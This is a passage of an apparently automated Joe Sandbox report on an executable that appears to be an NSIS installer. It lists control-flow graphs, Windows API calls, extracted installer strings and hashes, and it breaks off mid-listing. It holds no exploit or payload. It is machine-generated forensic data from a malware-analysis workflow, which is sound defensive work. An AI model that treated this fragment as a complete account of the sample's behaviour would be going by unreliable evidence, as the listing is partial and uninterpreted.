                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                          • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                          • API String ID: 2435955865-239407132
                                                          • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                          • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                          • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                          • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 820 4074bb-4074c0 821 4074c2-4074ef 820->821 822 40752f-407547 820->822 823 4074f1-4074f4 821->823 824 4074f6-4074fa 821->824 825 407aeb-407aff 822->825 826 407506-407509 823->826 827 407502 824->827 828 4074fc-407500 824->828 829 407b01-407b17 825->829 830 407b19-407b2c 825->830 831 407527-40752a 826->831 832 40750b-407514 826->832 827->826 828->826 833 407b33-407b3a 829->833 830->833 838 4076f6-407713 831->838 836 407516 832->836 837 407519-407525 832->837 834 407b61-407c68 833->834 835 407b3c-407b40 833->835 851 407350 834->851 852 407cec 834->852 839 407b46-407b5e 835->839 840 407ccd-407cd4 835->840 836->837 844 407589-4075b6 837->844 842 407715-407729 838->842 843 40772b-40773e 838->843 839->834 845 407cdd-407cea 840->845 849 407741-40774b 842->849 843->849 846 4075d2-4075ec 844->846 847 4075b8-4075d0 844->847 850 407cef-407cf6 845->850 853 4075f0-4075fa 846->853 847->853 854 40774d 849->854 855 4076ee-4076f4 849->855 856 407357-40735b 851->856 857 40749b-4074b6 851->857 858 40746d-407471 851->858 859 4073ff-407403 851->859 852->850 862 407600 853->862 863 407571-407577 853->863 864 407845-4078a1 854->864 865 4076c9-4076cd 854->865 855->838 861 407692-40769c 855->861 856->845 873 407361-40736e 856->873 857->825 874 407c76-407c7d 858->874 875 407477-40748b 858->875 877 407409-407420 859->877 878 407c6d-407c74 859->878 866 4076a2-4076c4 861->866 867 407c9a-407ca1 861->867 880 407556-40756e 862->880 881 407c7f-407c86 862->881 868 40762a-407630 863->868 869 40757d-407583 863->869 864->825 871 407c91-407c98 865->871 872 4076d3-4076eb 865->872 866->864 867->845 882 40768e 868->882 884 407632-40764f 868->884 869->844 869->882 871->845 872->855 873->852 883 407374-4073ba 873->883 874->845 879 40748e-407496 875->879 885 407423-407427 877->885 878->845 879->858 889 407498 879->889 880->863 881->845 882->861 887 4073e2-4073e4 883->887 888 4073bc-4073c0 883->888 890 407651-407665 884->890 891 407667-40767a 884->891 885->859 886 407429-40742f 885->886 892 407431-407438 886->892 893 407459-40746b 886->893 896 4073f5-4073fd 887->896 897 4073e6-4073f3 887->897 894 4073c2-4073c5 GlobalFree 888->894 895 4073cb-4073d9 GlobalAlloc 888->895 889->857 898 40767d-407687 890->898 891->898 899 407443-407453 GlobalAlloc 892->899 900 40743a-40743d GlobalFree 892->900 893->879 894->895 895->852 901 4073df 895->901 896->885 897->896 897->897 898->868 902 407689 898->902 899->852 899->893 900->899 901->887 904 407c88-407c8f 902->904 905 40760f-407627 902->905 904->845 905->868
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                          • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                          • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                          • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                          • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: AddressHandleLibraryLoadModuleProc
                                                          • String ID:
                                                          • API String ID: 310444273-0
                                                          • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                          • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                          • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                          • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                          APIs
                                                          • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                          • FindClose.KERNEL32(00000000), ref: 004062EC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID:
                                                          • API String ID: 2295610775-0
                                                          • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                          • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                          • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                          • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 56 405479-40548b 57 405491-405497 56->57 58 4055cd-4055dc 56->58 57->58 59 40549d-4054a6 57->59 60 40562b-405640 58->60 61 4055de-405626 GetDlgItem * 2 call 403d3f SetClassLongW call 40141d 58->61 62 4054a8-4054b5 SetWindowPos 59->62 63 4054bb-4054be 59->63 65 405680-405685 call 403daf 60->65 66 405642-405645 60->66 61->60 62->63 68 4054c0-4054d2 ShowWindow 63->68 69 4054d8-4054de 63->69 74 40568a-4056a5 65->74 71 405647-405652 call 40139d 66->71 72 405678-40567a 66->72 68->69 75 4054e0-4054f5 DestroyWindow 69->75 76 4054fa-4054fd 69->76 71->72 93 405654-405673 SendMessageW 71->93 72->65 73 405920 72->73 81 405922-405929 73->81 79 4056a7-4056a9 call 40141d 74->79 80 4056ae-4056b4 74->80 82 4058fd-405903 75->82 84 405510-405516 76->84 85 4054ff-40550b SetWindowLongW 76->85 79->80 89 4056ba-4056c5 80->89 90 4058de-4058f7 DestroyWindow KiUserCallbackDispatcher 80->90 82->73 87 405905-40590b 82->87 91 4055b9-4055c8 call 403dca 84->91 92 40551c-40552d GetDlgItem 84->92 85->81 87->73 95 40590d-405916 ShowWindow 87->95 89->90 96 4056cb-405718 call 406805 call 403d3f * 3 GetDlgItem 89->96 90->82 91->81 97 40554c-40554f 92->97 98 40552f-405546 SendMessageW IsWindowEnabled 92->98 93->81 95->73 126 405723-40575f ShowWindow KiUserCallbackDispatcher call 403d85 EnableWindow 96->126 127 40571a-405720 96->127 101 405551-405552 97->101 102 405554-405557 97->102 98->73 98->97 103 405582-405587 call 403d18 101->103 104 405565-40556a 102->104 105 405559-40555f 102->105 103->91 107 4055a0-4055b3 SendMessageW 104->107 109 40556c-405572 104->109 105->107 108 405561-405563 105->108 107->91 108->103 112 405574-40557a call 40141d 109->112 113 405589-405592 call 40141d 109->113 122 405580 112->122 113->91 123 405594-40559e 113->123 122->103 123->122 130 405761-405762 126->130 131 405764 126->131 127->126 132 405766-405794 GetSystemMenu EnableMenuItem SendMessageW 130->132 131->132 133 405796-4057a7 SendMessageW 132->133 134 4057a9 132->134 135 4057af-4057ed call 403d98 call 406009 lstrlenW call 406805 SetWindowTextW call 40139d 133->135 134->135 135->74 144 4057f3-4057f5 135->144 144->74 145 4057fb-4057ff 144->145 146 405801-405807 145->146 147 40581e-405832 DestroyWindow 145->147 146->73 148 40580d-405813 146->148 147->82 149 405838-405865 CreateDialogParamW 147->149 148->74 150 405819 148->150 149->82 151 40586b-4058c2 call 403d3f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 149->151 150->73 151->73 156 4058c4-4058d7 ShowWindow call 403daf 151->156 158 4058dc 156->158 158->82
                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                          • ShowWindow.USER32(?), ref: 004054D2
                                                          • DestroyWindow.USER32 ref: 004054E6
                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                          • GetDlgItem.USER32(?,?), ref: 00405523
                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                          • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                          • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                          • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                          • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                          • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                                          • EnableWindow.USER32(?,?), ref: 00405757
                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                          • EnableMenuItem.USER32(00000000), ref: 00405774
                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                          • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                          • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                          • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                          • String ID: @rD
                                                          • API String ID: 3282139019-3814967855
                                                          • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                          • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                          • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                          • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 159 4015a0-4015f4 160 4030e3-4030ec 159->160 161 4015fa 159->161 187 4030ee-4030f2 160->187 162 401601-401611 call 4062a3 161->162 163 401742-40174f 161->163 164 401962-40197d call 40145c GetFullPathNameW 161->164 165 4019ca-4019e6 call 40145c SearchPathW 161->165 166 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 161->166 167 401650-40166d call 40137e call 4062a3 call 40139d 161->167 168 4017b1-4017d8 call 40145c call 4062a3 call 405d59 161->168 169 401672-401686 call 40145c call 4062a3 161->169 170 401693-4016ac call 401446 call 4062a3 161->170 171 401715-401731 161->171 172 401616-40162d call 40145c call 4062a3 call 404f72 161->172 173 4016d6-4016db 161->173 174 401736-4030de 161->174 175 401897-4018a7 call 40145c call 4062d5 161->175 176 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 161->176 177 40163c-401645 161->177 178 4016bd-4016d1 call 4062a3 SetForegroundWindow 161->178 162->187 194 401751-401755 ShowWindow 163->194 195 401758-40175f 163->195 216 4019a3-4019a8 164->216 217 40197f-401984 164->217 165->160 223 4019ec-4019f8 165->223 166->160 249 40179a-4017a6 call 4062a3 166->249 167->187 263 401864-40186c 168->263 264 4017de-4017fc call 405d06 CreateDirectoryW 168->264 238 401689-40168e call 404f72 169->238 243 4016b1-4016b8 Sleep 170->243 244 4016ae-4016b0 170->244 171->187 191 401632-401637 172->191 189 401702-401710 173->189 190 4016dd-4016fd call 401446 173->190 174->160 219 4030de call 405f51 174->219 239 4018c2-4018d6 call 4062a3 175->239 240 4018a9-4018bd call 4062a3 175->240 274 401912-401919 176->274 275 40191e-401921 176->275 177->191 192 401647-40164e PostQuitMessage 177->192 178->160 189->160 190->160 191->187 192->191 194->195 195->160 212 401765-401769 ShowWindow 195->212 212->160 231 4019af-4019b2 216->231 230 401986-401989 217->230 217->231 219->160 223->160 230->231 241 40198b-401993 call 4062d5 230->241 231->160 245 4019b8-4019c5 GetShortPathNameW 231->245 238->160 239->187 240->187 241->216 266 401995-4019a1 call 406009 241->266 243->160 244->243 245->160 258 4017ab-4017ac 249->258 258->160 270 401890-401892 263->270 271 40186e-40188b call 404f72 call 406009 SetCurrentDirectoryW 263->271 278 401846-40184e call 4062a3 264->278 279 4017fe-401809 GetLastError 264->279 266->231 270->238 271->160 274->238 280 401923-40192b call 4062d5 275->280 281 40194a-401950 275->281 292 401853-401854 278->292 283 401827-401832 GetFileAttributesW 279->283 284 40180b-401825 GetLastError call 4062a3 279->284 280->281 298 40192d-401948 call 406c68 call 404f72 280->298 288 401957-40195d call 4062a3 281->288 290 401834-401844 call 4062a3 283->290 291 401855-40185e 283->291 284->291 288->258 290->292 291->263 291->264 292->291 298->288
                                                          APIs
                                                          • PostQuitMessage.USER32(00000000), ref: 00401648
                                                          • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                          • SetForegroundWindow.USER32(?), ref: 004016CB
                                                          • ShowWindow.USER32(?), ref: 00401753
                                                          • ShowWindow.USER32(?), ref: 00401767
                                                          • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                          • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                          • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                          • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                          • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                          • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                          • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                          Strings
                                                          • CreateDirectory: "%s" created, xrefs: 00401849
                                                          • Call: %d, xrefs: 0040165A
                                                          • SetFileAttributes failed., xrefs: 004017A1
                                                          • Aborting: "%s", xrefs: 0040161D
                                                          • Rename on reboot: %s, xrefs: 00401943
                                                          • Sleep(%d), xrefs: 0040169D
                                                          • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                          • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                          • detailprint: %s, xrefs: 00401679
                                                          • Rename failed: %s, xrefs: 0040194B
                                                          • BringToFront, xrefs: 004016BD
                                                          • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                          • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                          • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                          • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                          • Jump: %d, xrefs: 00401602
                                                          • Rename: %s, xrefs: 004018F8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                          • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                          • API String ID: 2872004960-3619442763
                                                          • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                          • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                          • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                          • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 426 40592c-405944 call 4062fc 429 405946-405956 call 405f51 426->429 430 405958-405990 call 405ed3 426->430 438 4059b3-4059dc call 403e95 call 40677e 429->438 435 405992-4059a3 call 405ed3 430->435 436 4059a8-4059ae lstrcatW 430->436 435->436 436->438 444 405a70-405a78 call 40677e 438->444 445 4059e2-4059e7 438->445 451 405a86-405a8d 444->451 452 405a7a-405a81 call 406805 444->452 445->444 446 4059ed-405a15 call 405ed3 445->446 446->444 453 405a17-405a1b 446->453 455 405aa6-405acb LoadImageW 451->455 456 405a8f-405a95 451->456 452->451 460 405a1d-405a2c call 405d06 453->460 461 405a2f-405a3b lstrlenW 453->461 458 405ad1-405b13 RegisterClassW 455->458 459 405b66-405b6e call 40141d 455->459 456->455 457 405a97-405a9c call 403e74 456->457 457->455 465 405c35 458->465 466 405b19-405b61 SystemParametersInfoW CreateWindowExW 458->466 478 405b70-405b73 459->478 479 405b78-405b83 call 403e95 459->479 460->461 462 405a63-405a6b call 406722 call 406009 461->462 463 405a3d-405a4b lstrcmpiW 461->463 462->444 463->462 470 405a4d-405a57 GetFileAttributesW 463->470 469 405c37-405c3e 465->469 466->459 475 405a59-405a5b 470->475 476 405a5d-405a5e call 406751 470->476 475->462 475->476 476->462 478->469 484 405b89-405ba6 ShowWindow LoadLibraryW 479->484 485 405c0c-405c0d call 405047 479->485 487 405ba8-405bad LoadLibraryW 484->487 488 405baf-405bc1 GetClassInfoW 484->488 491 405c12-405c14 485->491 487->488 489 405bc3-405bd3 GetClassInfoW RegisterClassW 488->489 490 405bd9-405bfc DialogBoxParamW call 40141d 488->490 489->490 495 405c01-405c0a call 403c68 490->495 493 405c16-405c1c 491->493 494 405c2e-405c30 call 40141d 491->494 493->478 496 405c22-405c29 call 40141d 493->496 494->465 495->469 496->478
                                                          APIs
                                                            • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                            • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                            • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                          • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                                          • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                          • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                          • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                          • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                          • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                            • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                          • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                          • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                          • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                          • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                          • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                          • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                          • API String ID: 608394941-1650083594
                                                          • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                          • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                          • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                          • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                          • lstrcatW.KERNEL32(00000000,00000000,%SenateRoof%,004CB0B0,00000000,00000000), ref: 00401A76
                                                          • CompareFileTime.KERNEL32(-00000014,?,%SenateRoof%,%SenateRoof%,00000000,00000000,%SenateRoof%,004CB0B0,00000000,00000000), ref: 00401AA0
                                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
